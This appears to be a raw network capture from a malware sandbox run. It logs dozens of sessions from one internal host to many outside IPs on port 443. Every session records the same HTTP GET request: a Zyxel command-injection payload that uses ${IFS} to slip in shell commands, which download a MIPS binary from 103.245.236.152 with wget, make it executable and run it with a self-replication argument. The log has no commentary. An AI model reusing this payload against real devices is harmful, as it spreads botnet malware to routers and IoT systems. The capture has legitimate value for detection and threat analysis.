                                          Jan 14, 2024 15:46:10.865411997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2882192.168.2.2342982176.120.138.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865432978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2883192.168.2.235230273.224.23.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865470886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2884192.168.2.2353842202.78.38.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865535021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2885192.168.2.2336724135.53.196.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865535021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2886192.168.2.233329249.194.46.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865555048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2887192.168.2.235951467.23.32.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865592957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2888192.168.2.2353178114.39.173.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865622997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2889192.168.2.235423676.148.237.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865629911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2890192.168.2.23451624.171.8.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865653038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2891192.168.2.2353370193.186.144.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865653992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2892192.168.2.2350644170.163.248.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865689039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2893192.168.2.2349802190.212.125.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865719080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2894192.168.2.234274659.208.205.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865751982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2895192.168.2.233699423.212.125.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865784883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2896192.168.2.233929672.239.153.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865791082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2897192.168.2.2350312164.172.204.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865820885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2898192.168.2.2357442187.28.251.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865852118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2899192.168.2.234109054.71.48.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865904093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2900192.168.2.2333296110.233.132.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865906000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2901192.168.2.2341626136.176.54.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865916967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2902192.168.2.236066214.246.33.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865945101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2903192.168.2.2340872129.172.255.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865957022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2904192.168.2.233373476.238.208.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865993977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2905192.168.2.23593184.112.250.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866003036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2906192.168.2.234222892.141.84.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866023064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2907192.168.2.233312493.146.33.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866039991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2908192.168.2.2360468208.246.15.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866060972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2909192.168.2.234166236.58.93.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866122007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2910192.168.2.2360750182.62.156.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866149902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2911192.168.2.236007436.207.80.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866189957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2912192.168.2.2358340193.79.74.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866221905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2913192.168.2.234602846.208.159.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866245031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2914192.168.2.2346866167.225.178.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866257906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2915192.168.2.2343826136.36.157.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866281033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2916192.168.2.235072247.192.132.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866291046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2917192.168.2.2333554103.127.150.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866328001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2918192.168.2.2351894153.197.202.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866345882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2919192.168.2.234237064.173.8.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866355896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2920192.168.2.2352720184.147.179.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866364956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2921192.168.2.235800850.179.121.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866404057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2922192.168.2.2341922188.235.39.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866451979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2923192.168.2.233810846.166.72.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866475105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2924192.168.2.2355770195.220.185.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866501093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2925192.168.2.235285459.238.66.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866512060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2926192.168.2.2349976175.197.96.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866530895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2927192.168.2.2333802112.155.206.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866540909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2928192.168.2.233878447.30.97.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866595984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2929192.168.2.2346380148.112.80.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866605043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2930192.168.2.2358006223.111.51.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866643906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2931192.168.2.2333916206.122.246.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866678953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2932192.168.2.2351142172.235.202.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866683960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2933192.168.2.2348930115.147.118.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866695881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2934192.168.2.2341048222.168.93.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866700888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2935192.168.2.2340030216.114.202.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866728067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2936192.168.2.2343078146.28.78.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866741896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2937192.168.2.233980096.68.128.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866741896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2938192.168.2.2349626166.214.95.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866760015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2939192.168.2.235092419.16.198.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866761923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2940192.168.2.233840239.62.12.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866853952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2941192.168.2.234032044.61.166.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866863966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2942192.168.2.2339344149.183.41.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866869926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2943192.168.2.235473065.136.244.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866898060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2944192.168.2.234988673.201.135.107443
                                          TimestampBytes transferredDirectionData
